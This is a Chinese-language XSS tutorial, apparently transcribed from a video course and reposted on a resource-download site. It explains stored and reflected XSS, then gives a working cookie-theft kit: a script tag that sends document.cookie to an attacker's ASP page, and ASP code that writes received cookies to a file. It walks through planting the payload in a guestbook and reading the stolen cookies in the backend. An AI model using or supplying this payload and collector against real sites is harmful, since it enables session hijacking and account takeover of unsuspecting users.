【整套视频课程1.2G】跨站攻击的概念于利用


1.跨站的概念

1.跨站要分为两类:

一类是存储型XSS,主要出现在让用户输入数据,供其他浏览此页的用户进行查看的地方,包括留言、评论、博客日志和各类表单等。应用程序从数据库中查询数据,在页面中显示出来,攻击者在相关页面输入恶意的脚本数据后,用户浏览此类页面就可能受到攻击。另外一类是参数型XSS,主要是将脚本加入URL地址的程序参数里,参数进入程序后在页面直接输出脚本内容,用户点击类似的恶意链接就可能受到攻击。传统的XSS攻击都是盘算如何盗取客户端COOKIE,然后劫持客户端和WEB服务端的会话,其他还有利用XSS进行网络钓鱼的攻击方法,这类攻击都是针对客户端进行攻击,而近年流行的XSS WORM攻击方式,是通过AJAX技术把恶意的XSS数据感染到每一个用户,可以对WEB服务造成很大的影响,间接实现了对WEB服务端的攻击。《也就是这种》

2.代码的解释

 2.用到的代码是

<script>document.location=’http://127.0.0.1/1.asp?msg=’+document.cookie</script>

相信这一句大家都熟悉吧

我们还要用到一个asp接口啊

<%

thisfile=Server.MapPath(“cookie.txt”)

msg=Request(“msg”)

set fs=server.CreateObject(“scripting.filesystemobject”)

set thisfile=fs.OpenTextFile(thisfile,8,True,0)

thisfile.WriteLine(“========cookie:”&msg&”======================[by:]=黑防”)

thisfile.close

set fs = nothing

%>   

1. server对象

server对象提供对服务器上的方法和属性的访问,其中大多数方法和属性是作为实用程序的功能的,语法格式为:

server.property method

其中property和method分别表示属性和方法

server对象的方法:

creareobject:创建服务器组件的实例。

execute:执行一个.asp文件

getlasterror:返回一个描述错误条件的asperror对象

htmlencode;将html编码应用到指定的字符串

mappath:将指定的虚拟路径,无论是当前服务器上的绝对路径还是当前页的相对路径,映射为物理路径

transfer:将当前所有的状态信息发送给另一个.asp文件进行处理

urlencode:将url编码规则,包括转移字符,应用到字符串。

2.使用server对象的createobject方法可以创建服务器组件的实例,语法格式如下:

server.mappath(path)

其中参数path指定要映射物理目录的相对或虚拟路径。如果path以一个正斜线(/)或反斜线(\)开始,mappath方法将返回路径时将path视为完整的虚拟路径;如果path不是斜线开始,mappath方法将返回相对于.asp文件已有的路径的路径。

3.filesystemobject主对象。提供对计算机文件系统的访问,包括用来创建,删除,和获得有关信息以及用来操作驱动器,文件夹和文件的方法和属性。

4.要创建一个文本文件并对其进行写操作,首先创建filesystemobject对象实例,然后通过调用该对象的createtextfile方法创建指定文件并返回textstream对象实例,接着使用textstream对象的方法对文件进行写操作并关闭文件

5.打开文件

filesystemobject对象的 opentextfile方法打开指定的文件并返回一个textstream对象,该对象可以用于对文件进行读,写和添加到结尾操作

语法格式

object.opentextfile(file【,iomode【,create【,format】】】)

其中object是必选参数,指定vfilesystemobject对象名称

filename也是必选参数,是一个字符串表达式,用于指定要打开的文件名称。

iomode 是可选参数,用于指定文件的输入,输出模式:如果该参数为1,或省掉,则以只读打开文件,不能写;如果2,只能对其写 不能读,如果为8 则是在文件末尾进行写操作

create是可选参数,取boolean值 指出当指定的filename不存在时是否能创建;如果为TRUE,则可以;如果false或省掉,则不能创建

vformat是可选参数,如果为0 后省掉 则以ascii格式打开文件;如果为-1,以unicode格式打开文件;如果为-2,则以系统默认格式打开文件

6.使用writeline方法向textstream文件写入指定字符串和新字符串,语法

object.writeline(【string】)

其中object是必选参数,指定textstream对象的名称。string是可选参数,指定写入的文件。如果省掉,将向文件新行字符

由于我的电脑没有连网所以就只能用本地做实验 啊

首先 把asp文件传到自己的空间里啊

好 了

再到网站提交数据啊

哦忘记说了

这里写的http://127.0.0.1/1.asp 是你自己传到空间的地址 后面的msg 就是这里的参数

实际操作

我们今天就是以留言版为例地到cookie

下一节课讲 怎么利用

我们今天就不分析代码

那是后来的问题

今天只是讲怎么获得

今天大家不用理解为什么会是这样的

我们以后要讲的

开始 二节课是让大家明白他的危害

在 以后的课程里 我们就不讲怎么获得cookie

只讲

存在的问题

我们是 以留言板为例

还是进入今天的主题啊

很简单啊

特别是代码分析的时候啊

我们找一个留言的地方啊

再给 我们获取cookie的代码写上啊

哈哈

好像看不出效果啊

我差点忘记了

代码没有改

我们进入后台看看

哈哈

看到没有啊、]

好了

内容来自嘟嘟资源网

资源下载
下载价格6 龙纹银币
VIP免费

原文链接:https://duduziy.com/440.html,转载请注明出处。 郑重声明: 本站所有内容仅供大家参考、学习,不存在任何商业目的与商业用途。 若您需要商业运营或用于其他商业活动,请您购买正版授权并合法使用。 我们不承担任何技术及版权问题,且不对任何资源负法律责任。 如遇到资源无法下载,请点击这里失效报错。失效报错提交后记得查看你的留言信息,24小时之内反馈信息。 如有侵犯您的版权,请给我们私信,我们会尽快处理,并诚恳的向你道歉!

0

评论0

显示验证码
没有账号?注册  忘记密码?